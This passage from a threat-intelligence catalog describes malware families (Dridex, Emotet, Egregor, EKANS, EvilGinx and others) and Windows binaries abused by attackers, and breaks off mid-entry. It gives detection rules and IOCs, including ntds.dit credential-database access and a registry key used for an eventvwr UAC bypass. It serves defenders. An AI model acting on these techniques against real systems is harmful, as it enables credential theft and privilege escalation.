[Doki](https://app.tidalcyber.com/software/e6160c55-1868-47bd-bec6-7becbf236bbb) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://app.tidalcyber.com/software/e6160c55-1868-47bd-bec6-7becbf236bbb) was used in conjunction with the [ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. <sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup>

The tag is: misp-galaxy:software="Doki"

Donut

[Donut](https://app.tidalcyber.com/software/40d25a38-91f4-4e07-bb97-8866bed8e44f) is an open source framework used to generate position-independent shellcode.<sup>[[Donut Github](https://app.tidalcyber.com/references/5f28c41f-6903-4779-93d4-3de99e031b70)]</sup><sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup> [Donut](https://app.tidalcyber.com/software/40d25a38-91f4-4e07-bb97-8866bed8e44f) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.<sup>[[NCC Group WastedLocker June 2020](https://app.tidalcyber.com/references/1520f2e5-2689-428f-9ee4-05e153a52381)]</sup>

The tag is: misp-galaxy:software="Donut"

Dotnet.exe - Associated Software

<sup>[[Dotnet.exe - LOLBAS Project](/references/8abe21ad-88d1-4a5c-b79e-8216b4b06862)]</sup>

The tag is: misp-galaxy:software="Dotnet.exe - Associated Software"

Dotnet

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: dotnet.exe comes with .NET Framework

Author: felamos

Paths:

* C:\Program Files\dotnet\dotnet.exe

The tag is: misp-galaxy:software="Dotnet"

Delphacy - Associated Software

The tag is: misp-galaxy:software="Delphacy - Associated Software"

Downdelph

[Downdelph](https://app.tidalcyber.com/software/f7b64b81-f9e7-46bf-8f63-6d7520da832c) is a first-stage downloader written in Delphi that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) in rare instances between 2013 and 2015. <sup>[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]</sup>

The tag is: misp-galaxy:software="Downdelph"

down_new

[down_new](https://app.tidalcyber.com/software/20b796cf-6c90-4928-999e-88107078e15e) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.<sup>[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]</sup>

The tag is: misp-galaxy:software="down_new"

DownPaper

[DownPaper](https://app.tidalcyber.com/software/fc433c9d-a7fe-4915-8aa0-06b58f288249) is a backdoor Trojan; its main functionality is to download and run second stage malware. <sup>[[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)]</sup>

The tag is: misp-galaxy:software="DownPaper"

DRATzarus

[DRATzarus](https://app.tidalcyber.com/software/c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf) is a remote access tool (RAT) that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://app.tidalcyber.com/software/c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf) shares similarities with [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293), which was used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) in 2017 to target the Turkish financial sector.<sup>[[ClearSky Lazarus Aug 2020](https://app.tidalcyber.com/references/2827e6e4-8163-47fb-9e22-b59e59cd338f)]</sup>

The tag is: misp-galaxy:software="DRATzarus"

Bugat v5 - Associated Software

The tag is: misp-galaxy:software="Bugat v5 - Associated Software"

Dridex

[Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) was created from the source code of the Bugat banking Trojan (also known as Cridex).<sup>[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)]</sup><sup>[[Kaspersky Dridex May 2017](https://app.tidalcyber.com/references/52c48bc3-2b53-4214-85c3-7e5dd036c969)]</sup><sup>[[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]</sup>

The tag is: misp-galaxy:software="Dridex"

DropBook

[DropBook](https://app.tidalcyber.com/software/9c44d3f9-7a7b-4716-9cfa-640b36548ab0) is a Python-based backdoor compiled with PyInstaller.<sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup>

The tag is: misp-galaxy:software="DropBook"

Drovorub

[Drovorub](https://app.tidalcyber.com/software/bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by APT28.<sup>[[NSA/FBI Drovorub August 2020](https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)]</sup>

The tag is: misp-galaxy:software="Drovorub"

dsdbutil.exe - Associated Software

<sup>[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]</sup>

The tag is: misp-galaxy:software="dsdbutil.exe - Associated Software"

dsdbutil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.

Author: Ekitji

Paths:

* C:\Windows\System32\dsdbutil.exe
* C:\Windows\SysWOW64\dsdbutil.exe

Detection:

* IOC: Event ID 4688
* IOC: dsdbutil.exe process creation
* IOC: Event ID 4663
* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
* IOC: Event ID 4656
* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
* Analysis: None Provided
* Sigma: None Provided
* Elastic: None Provided
* Splunk: None Provided
* BlockRule: None Provided<sup>[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]</sup>

The tag is: misp-galaxy:software="dsdbutil"

dsquery.exe - Associated Software

The tag is: misp-galaxy:software="dsquery.exe - Associated Software"

dsquery

[dsquery](https://app.tidalcyber.com/software/06402bdc-a4a1-4e4a-bfc4-09f2c159af75) is a command-line utility that can be used to query Active Directory for information from a system within a domain. <sup>[[TechNet Dsquery](https://app.tidalcyber.com/references/bbbb4a45-2963-4f04-901a-fb2752800e12)]</sup> It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

The tag is: misp-galaxy:software="dsquery"

Dtrack

[Dtrack](https://app.tidalcyber.com/software/aa21462d-9653-48eb-a82e-5c93c9db5f7a) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://app.tidalcyber.com/software/aa21462d-9653-48eb-a82e-5c93c9db5f7a) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). <sup>[[Kaspersky Dtrack](https://app.tidalcyber.com/references/0122ee35-938d-493f-a3bb-bc75fc808f62)]</sup><sup>[[Securelist Dtrack](https://app.tidalcyber.com/references/49bd8841-a4b5-4ced-adfa-0ad0c8625ccd)]</sup><sup>[[Dragos WASSONITE](https://app.tidalcyber.com/references/39e6ab06-9f9f-4292-9034-b2f56064164d)]</sup><sup>[[CyberBit Dtrack](https://app.tidalcyber.com/references/1ac944f4-868c-4312-8b5d-1580fd6542a0)]</sup><sup>[[ZDNet Dtrack](https://app.tidalcyber.com/references/6e6e02da-b805-47d7-b410-343a1b5da042)]</sup>

The tag is: misp-galaxy:software="Dtrack"

Dump64.exe - Associated Software

<sup>[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]</sup>

The tag is: misp-galaxy:software="Dump64.exe - Associated Software"

Dump64

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Memory dump tool that comes with Microsoft Visual Studio

Author: mr.d0x

Paths:

* C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe

Detection:

* Sigma: [proc_creation_win_lolbin_dump64.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml)
* IOC: As a Windows SDK binary, execution on a system may be suspicious<sup>[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]</sup>

The tag is: misp-galaxy:software="Dump64"

DumpMinitool.exe - Associated Software

<sup>[[DumpMinitool.exe - LOLBAS Project](/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]</sup>

The tag is: misp-galaxy:software="DumpMinitool.exe - Associated Software"

DumpMinitool

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Dump tool part Visual Studio 2022

Author: mr.d0x

Paths:

* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

Detection:

* Sigma: [proc_creation_win_dumpminitool_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml)
* Sigma: [proc_creation_win_dumpminitool_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml)
* Sigma: proc_creation_win_devinit_lolbin_usage.yml<sup>[[DumpMinitool.exe - LOLBAS Project](/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]</sup>

The tag is: misp-galaxy:software="DumpMinitool"

Duqu

[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. <sup>[[Symantec W32.Duqu](https://app.tidalcyber.com/references/8660411a-6b9c-46c2-8f5f-049ec60c7d40)]</sup>

The tag is: misp-galaxy:software="Duqu"

NeD Worm - Associated Software

The tag is: misp-galaxy:software="NeD Worm - Associated Software"

DustySky

The tag is: misp-galaxy:software="DustySky"

Dxcap.exe - Associated Software

<sup>[[Dxcap.exe - LOLBAS Project](/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]</sup>

The tag is: misp-galaxy:software="Dxcap.exe - Associated Software"

Dxcap

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: DirectX diagnostics/debugger included with Visual Studio.

Author: Oddvar Moe

Paths:

* C:\Windows\System32\dxcap.exe
* C:\Windows\SysWOW64\dxcap.exe

Detection:

* Sigma: proc_creation_win_lolbin_susp_dxcap.yml<sup>[[Dxcap.exe - LOLBAS Project](/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]</sup>

The tag is: misp-galaxy:software="Dxcap"

Dyzap - Associated Software

The tag is: misp-galaxy:software="Dyzap - Associated Software"

Dyreza - Associated Software

The tag is: misp-galaxy:software="Dyreza - Associated Software"

Dyre

[Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724) is a banking Trojan that has been used for financial gain. <sup>[[Symantec Dyre June 2015](https://app.tidalcyber.com/references/a9780bb0-302f-44c2-8252-b53d94da24e6)]</sup><sup>[[Malwarebytes Dyreza November 2015](https://app.tidalcyber.com/references/0a5719f2-8a88-44e2-81c5-2d16a39f1f8d)]</sup>

The tag is: misp-galaxy:software="Dyre"

Earthworm

Earthworm is an open-source tool. According to its project website, Earthworm is a "simple network tunnel with SOCKS v5 server and port transfer".<sup>[[Elastic Docs Potential Protocol Tunneling via EarthWorm](/references/a02790a1-f7c5-43b6-bc7e-075b2c0aa791)]</sup> According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.<sup>[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]</sup>

The tag is: misp-galaxy:software="Earthworm"

Ebury

[Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).<sup>[[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)]</sup><sup>[[BleepingComputer Ebury March 2017](https://app.tidalcyber.com/references/e5d69297-b0f3-4586-9eb7-d2922b3ee7bb)]</sup><sup>[[ESET Ebury Oct 2017](https://app.tidalcyber.com/references/5257a8ed-1cc8-42f8-86a7-8c0fd0e553a7)]</sup>

The tag is: misp-galaxy:software="Ebury"

ECCENTRICBANDWAGON

[ECCENTRICBANDWAGON](https://app.tidalcyber.com/software/70f703b3-0e24-4ffe-9772-f0e386ec607f) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool, with keylogging and screen capture functionality, used for information gathering on compromised systems.<sup>[[CISA EB Aug 2020](https://app.tidalcyber.com/references/a1b143f9-ca85-4c11-8909-49423c9ffeab)]</sup>

The tag is: misp-galaxy:software="ECCENTRICBANDWAGON"

HEAVYHAND - Associated Software

The tag is: misp-galaxy:software="HEAVYHAND - Associated Software"

SigLoader - Associated Software

The tag is: misp-galaxy:software="SigLoader - Associated Software"

DESLoader - Associated Software

The tag is: misp-galaxy:software="DESLoader - Associated Software"

Egregor

[Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66) and Sekhmet ransomware, as well as [Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) ransomware.<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup><sup>[[Cyble Egregor Oct 2020](https://app.tidalcyber.com/references/545a131d-88fc-4b34-923c-0b759b45fc7f)]</sup><sup>[[Security Boulevard Egregor Oct 2020](https://app.tidalcyber.com/references/cd37a000-9e15-45a3-a7c9-bb508c10e55d)]</sup>

The tag is: misp-galaxy:software="Egregor"

SNAKEHOSE - Associated Software

The tag is: misp-galaxy:software="SNAKEHOSE - Associated Software"

EKANS

[EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) is a ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in MegaCortex.<sup>[[Dragos EKANS](https://app.tidalcyber.com/references/c8a018c5-caa3-4af1-b210-b65bbf94c8b2)]</sup><sup>[[Palo Alto Unit 42 EKANS](https://app.tidalcyber.com/references/dcdd4e48-3c3d-4008-a6f6-390f896f147b)]</sup>

The tag is: misp-galaxy:software="EKANS"

Page - Associated Software

The tag is: misp-galaxy:software="Page - Associated Software"

BKDR_ESILE - Associated Software

The tag is: misp-galaxy:software="BKDR_ESILE - Associated Software"

Elise

[Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. <sup>[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]</sup><sup>[[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]</sup>

The tag is: misp-galaxy:software="Elise"

ELMER

[ELMER](https://app.tidalcyber.com/software/6a3ca97e-6dd6-44e5-a5f0-7225099ab474) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://app.tidalcyber.com/groups/06a05175-0812-44f5-a529-30eba07d1762). <sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup>

The tag is: misp-galaxy:software="ELMER"

Emissary

[Emissary](https://app.tidalcyber.com/software/fd95d38d-83f9-4b31-8292-ba2b04275b36) is a Trojan that has been used by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It shares code with [Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24), with both Trojans being part of a malware group referred to as LStudio. <sup>[[Lotus Blossom Dec 2015](https://app.tidalcyber.com/references/dcbe51a0-6d63-4401-b19e-46cd3c42204c)]</sup>

The tag is: misp-galaxy:software="Emissary"

Geodo - Associated Software

The tag is: misp-galaxy:software="Geodo - Associated Software"

Emotet

[Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. <sup>[[Trend Micro Banking Malware Jan 2019](https://app.tidalcyber.com/references/4fee21e3-1b8f-4e10-b077-b59e2df94633)]</sup>

The tag is: misp-galaxy:software="Emotet"

EmPyre - Associated Software

The tag is: misp-galaxy:software="EmPyre - Associated Software"

PowerShell Empire - Associated Software

The tag is: misp-galaxy:software="PowerShell Empire - Associated Software"

Empire

[Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) for Windows and Python for Linux/macOS. [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.<sup>[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup><sup>[[GitHub ATTACK Empire](https://app.tidalcyber.com/references/b3d6bb33-2b23-4c0a-b8fa-e002a5c7edfc)]</sup>

The tag is: misp-galaxy:software="Empire"

EnvyScout

The tag is: misp-galaxy:software="EnvyScout"

Tavdig - Associated Software

The tag is: misp-galaxy:software="Tavdig - Associated Software"

Wipbot - Associated Software

The tag is: misp-galaxy:software="Wipbot - Associated Software"

WorldCupSec - Associated Software

The tag is: misp-galaxy:software="WorldCupSec - Associated Software"

TadjMakhal - Associated Software

The tag is: misp-galaxy:software="TadjMakhal - Associated Software"

esentutl.exe - Associated Software

The tag is: misp-galaxy:software="esentutl.exe - Associated Software"

esentutl

[esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.<sup>[[Microsoft Esentutl](https://app.tidalcyber.com/references/08fb9e84-495f-4710-bd1e-417eb8191a10)]</sup>

The tag is: misp-galaxy:software="esentutl"

Eventvwr.exe - Associated Software

<sup>[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]</sup>

The tag is: misp-galaxy:software="Eventvwr.exe - Associated Software"

Eventvwr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Displays Windows Event Logs in a GUI window.

Author: Jacob Gajek

Paths:

* C:\Windows\System32\eventvwr.exe
* C:\Windows\SysWOW64\eventvwr.exe

Detection:

* Sigma: [proc_creation_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml)
* Sigma: [registry_set_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml)
* Sigma: [file_event_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml)
* Elastic: [privilege_escalation_uac_bypass_event_viewer.toml](https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml)
* Splunk: [eventvwr_uac_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml)
* IOC: eventvwr.exe launching child process other than mmc.exe
* IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command<sup>[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]</sup>

The tag is: misp-galaxy:software="Eventvwr"

EvilBunny

[EvilBunny](https://app.tidalcyber.com/software/300e8176-e7ee-44ef-8d10-dff96502f6c6) is a C++ malware sample observed since 2011 that was designed to be an execution platform for Lua scripts.<sup>[[Cyphort EvilBunny Dec 2014](https://app.tidalcyber.com/references/a0218d0f-3378-4508-9d3c-a7cd3e00a156)]</sup>

The tag is: misp-galaxy:software="EvilBunny"

EvilGinx

EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication".<sup>[[GitHub evilginx2](/references/eea178f4-80bd-49d1-84b1-f80671e9a3e4)]</sup>

The tag is: misp-galaxy:software="EvilGinx"

EvilGrab

[EvilGrab](https://app.tidalcyber.com/software/e862419c-d6b6-4433-a02a-c1cc98ea6f9e) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) via malicious Microsoft Office documents as part of spearphishing campaigns. <sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup>

The tag is: misp-galaxy:software="EvilGrab"

EVILNUM

The tag is: misp-galaxy:software="EVILNUM"

Exaramel for Linux

[Exaramel for Linux](https://app.tidalcyber.com/software/c773f709-b5fe-4514-9d88-24ceb0dd8063) is a backdoor written in the Go programming language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://app.tidalcyber.com/software/21569dfb-c9f1-468e-903e-348f19dbae1f).<sup>[[ESET TeleBots Oct 2018](https://app.tidalcyber.com/references/56372448-03f5-49b5-a2a9-384fbd49fefc)]</sup>

The tag is: misp-galaxy:software="Exaramel for Linux"

Exaramel for Windows

[Exaramel for Windows](https://app.tidalcyber.com/software/21569dfb-c9f1-468e-903e-348f19dbae1f) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://app.tidalcyber.com/software/c773f709-b5fe-4514-9d88-24ceb0dd8063).<sup>[[ESET TeleBots Oct 2018](https://app.tidalcyber.com/references/56372448-03f5-49b5-a2a9-384fbd49fefc)]</sup>

The tag is: misp-galaxy:software="Exaramel for Windows"

Excel.exe - Associated Software

<sup>[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]</sup>

The tag is: misp-galaxy:software="Excel.exe - Associated Software"

Excel

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary

Author: Reegun J (OCBC Bank)

Paths:
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
* C:\Program Files\Microsoft Office\Office16\Excel.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
* C:\Program Files\Microsoft Office\Office15\Excel.exe
* C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
* C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
* C:\Program Files\Microsoft Office\Office14\Excel.exe
* C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
* C:\Program Files\Microsoft Office\Office12\Excel.exe

Detection:
* Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml)
* IOC: Suspicious Office application Internet/network traffic<sup>[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]</sup>

The tag is: misp-galaxy:software="Excel"

ExMatter

ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.<sup>[[Symantec Noberus September 22 2022](/references/afd6808d-2c9f-4926-b7c6-ca9d3abdd923)]</sup>

The tag is: misp-galaxy:software="ExMatter"

Expand.exe - Associated Software

The tag is: misp-galaxy:software="Expand.exe - Associated Software"

Expand

[Expand](https://app.tidalcyber.com/software/5d7a39e3-c667-45b3-987e-3b0ca49cff61) is a Windows utility used to expand one or more compressed CAB files.<sup>[[Microsoft Expand Utility](https://app.tidalcyber.com/references/bf73a375-87b7-4603-8734-9f3d8d11967e)]</sup> It has been used by [BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) to decompress a CAB file into executable content.<sup>[[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]</sup>

The tag is: misp-galaxy:software="Expand"

Explorer.exe - Associated Software

<sup>[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]</sup>

The tag is: misp-galaxy:software="Explorer.exe - Associated Software"

Explorer

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used for managing files and system components within Windows

Author: Jai Minton

Paths:
* C:\Windows\explorer.exe
* C:\Windows\SysWOW64\explorer.exe

Detection:
* Sigma: [proc_creation_win_explorer_break_process_tree.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml)
* Sigma: [proc_creation_win_explorer_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml)
